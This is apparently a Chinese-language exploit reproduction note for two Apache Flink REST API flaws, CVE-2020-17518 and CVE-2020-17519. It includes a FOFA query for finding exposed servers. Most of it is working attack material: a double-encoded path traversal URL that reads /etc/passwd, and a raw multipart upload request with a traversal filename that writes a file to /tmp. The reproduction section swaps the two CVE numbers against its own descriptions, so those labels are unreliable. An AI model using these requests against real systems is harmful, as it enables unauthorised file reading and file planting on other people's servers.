fofa搜索
app=“APACHE-Flink”
漏洞编号:
CVE-2020-17518,CVE-2020-17519
漏洞描述:
CVE-2020-17518:通过REST API写入远程文件
受影响的版本:
Flink 1.5.1-1.11.2
Flink 1.5.1引入了REST API,可通过恶意修改的HTTP HEADER,将任意文件复制到文件系统的任意位置。
CVE-2020-17519:通过REST API读取远程文件
受影响的版本:
1.11.0、1.11.1、1.11.2
Apache Flink 1.11.0-1.11.2中引入的一项更改,允许攻击者通过JobManager进程的REST接口读取本地文件系统上的任何文件,访问仅限于JobManager进程可访问的文件。
漏洞复现
CVE-2020-17518
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
CVE-2020-17519
构造数据包进行发送
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
返回400,添加成功
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess